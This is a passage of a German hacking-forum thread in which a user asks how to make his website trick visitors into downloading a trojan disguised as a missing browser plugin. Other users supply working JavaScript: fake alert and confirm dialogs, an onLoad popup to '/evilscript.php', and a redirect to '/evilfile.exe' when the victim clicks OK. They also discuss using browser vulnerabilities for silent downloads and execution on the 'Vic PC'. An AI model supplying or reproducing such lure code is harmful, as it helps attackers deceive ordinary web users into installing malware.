Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 11
  1. #1
    Eigener Benutzertitel Avatar von inmate
    Registriert seit
    23.12.2008
    Beiträge
    1.767

    Standard Plugin Download über HTML

    Moin , also ich mach mir grade ne kleine Seite und wollte fragen ob es möglich ist nen Fake Plugin zu machen , also das die Besucher die auf die Seite gehen nen Popup Fenster zu Gesicht bekommen wo dann gesagt wird das ein Plugin fehlt.
    Dieses Plugin soll dann ein Trojaner sein.
    Wäre das machbar ?
    Wenn ja wie ?
    ^^


    mfG


    iPott <3

  2. #2
    ~Polska~ Avatar von Zylasty
    Registriert seit
    21.03.2008
    Beiträge
    442

    Standard

    Sowas wäre cool
    Du kannst aber doch einfach per java-Script n neues Fenster öffnen lassen, z.B. wo n Stopschild (hihi) ist und da steht, dass die neuste Version von what ever zum richtigen Darstellen der Seite gebraucht wird. Und dann einfach: Hätte den selben Effekt.
    Oder kannst es natürlich auch über Flash machen... Deiner Phantasie sind keine Grenzen gesetzt
    Geändert von Zylasty (19.06.2009 um 14:57 Uhr)

  3. #3
    W64.run Avatar von Clode
    Registriert seit
    03.10.2008
    Beiträge
    233

    Standard

    Jetzt wissen alle, dass Sie wohl besser nicht auf deine Seiten gehen werden..

    Back-to-topic:
    Es muss ja nicht unbedingt ein PopUp sein.. Muss ja nur so aussehen.
    Wenn du bissel geschickt bist bekommst das ja auch mit HTML hin,
    oder gar mit javascript ein "Alert" vortäuschen.

    Beispiel für Javascript in HTML
    Code:
    <script language="javascript" type="text/javascript">
    <!-- // JavaScript-Bereich für ältere  Browser auskommentieren
            alert ('Ihnen fehlt folgendes plugin, um fortfahren zu können:\n' +
            'UltraLOLpwnTROJANER!!!11elf!');
    // -->
    </script>
    Kannst mal
    Code:
    javascript:alert ('Ihnen fehlt folgendes plugin, um fortfahren zu können:\n' + 'UltraLOLpwnTROJANER!!!11elf!')
    in Browser eingeben.. Dann haste das Ergebnis.

    MfG Clode

    EDIT: Misst da war einer schneller

  4. #4
    Eigener Benutzertitel Avatar von inmate
    Registriert seit
    23.12.2008
    Beiträge
    1.767

    Standard

    Cool danke erstmal.
    Sowas habe ich gesucht.
    Doch leider habe ich von java ka.^^
    Daher bitte ich dich nochmal um Hilfe ^^.
    Also wenn er auf OK klickt soll nen download fenstern aufgehen wo er eine Datei von meinem FTP runnerläd.
    Also wenn er auf OK klickt soll ein Link aufgerufen werden.

    danke schonmal

    mfG
    Geändert von inmate (19.06.2009 um 15:31 Uhr)


    iPott <3

  5. #5
    Bad Times Virus Avatar von Cyberhunter
    Registriert seit
    14.12.2008
    Beiträge
    511

    Standard

    An besten wäre es wenn es sich im hintergrund runterlädt.
    Wär doch soweit ich weiß auch möglich oder?
    ICQ: 463034026



    Zitat von: ^^
    Ich bleib bei mein XP 100%ig
    Da ist mir dieses Windows zu Unsicher!

  6. #6
    Eigener Benutzertitel Avatar von inmate
    Registriert seit
    23.12.2008
    Beiträge
    1.767

    Standard

    Wow wenn das einer könnte wäre es natürlich noch geiler ^^.
    Ja stimmt möglich wäre es.
    mfG


    iPott <3

  7. #7
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Per HTML geht das natürlich nicht. HTML ist nur zum darstellen geeignet und hat keine Funktionen etc. Was Du suchst geht per JavaScript.

    Aber warum kein Popup? Danach hatte inmate ja gefragt:

    HTML-Code:
    <html>
    <head>
    </head>
    <body onLoad="window.open('/evilscript.php', 'Plugin',  'width=500, height=500, status=no, scrollbars=no, resizable=no');">
    Inhalt der HTML-Seite
    </body>
    </html>
    Öffnet evilscript.html in einem externen Fenster mit 500*500 Pixeln Größe.

    Zu inmates vorletzten Post:

    Code:
    <script language="JavaScript" type="text/javascript">
    <!--
    
    var agree=confirm("Es fehlt ein Plugin auf Ihrem Rechner, welches zur Ausführung dieser Webseite benötigt wird. Installieren?");
    
    if(agree) {
    
    	window.location.href="/evilfile.exe";
    	
    } else {
    
    	window.location.href="about:blank";
    	
    }
    
    //-->
    </script>
    Es öffnet sich ein Alarmfenster, bei welchem der User mit "ok" bestätigen soll, dass er das Plugin installieren möchte. Wenn "ok" geklickt wird, wird der User auf die Datei (evilfile.exe) weitergeleitet, welche dann durch einen Downloaddialog heruntergeladen werden soll.

    Das Script kannst Du auch in eine Funktion packen, die Du z.B. "checkplugin()" nennst. Dieses wird im Body ausgeführt:

    HTML-Code:
    <body onLoad="checkplugin()">
    Bei "abbrechen" landet er auf einer weißen Seite (about:blank).

    EDIT: Für einen Download im Hintergrund bräuchtest Du erstmal eine Sicherheitslücke im Browser. Da finde ich die Variante mit dem Virus per freiwilligen Download schon besser, da nicht jeder eine alte Version eines Browsers hat.
    Geändert von VeN0m (19.06.2009 um 16:33 Uhr)
    Come to the dark side - We have cookies

  8. #8
    Eigener Benutzertitel Avatar von inmate
    Registriert seit
    23.12.2008
    Beiträge
    1.767

    Standard

    So ist es perfekt

    Danke

    Gibt es eigentlich jetzt noch ne Möglichkeit dieses "Plugin" auf dem Vic PC zu starten ? ^^

    mfG


    iPott <3

  9. #9
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Wenn Du eine Lücke auf dem Vic-PC findest, die das Ausführen der Anwendung erlaubt, dann ja. Gibt ja Lücken im Flashplayer, IE etc. Einfach mal ein Wenig umhören. Ist jedoch nicht so mein Themengebiet.
    Man kann jedoch davon ausgehen, dass jemand, der ein "Plugin" downloadet dieses auch ausführt .
    Come to the dark side - We have cookies

  10. #10
    Eigener Benutzertitel Avatar von inmate
    Registriert seit
    23.12.2008
    Beiträge
    1.767

    Standard

    Ja stimmt auch wieder

    Na dann ist ja alles geklärt


    mfG

    closed
    Geändert von Toastbrot (20.06.2009 um 14:40 Uhr)


    iPott <3

Seite 1 von 2 12 LetzteLetzte

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •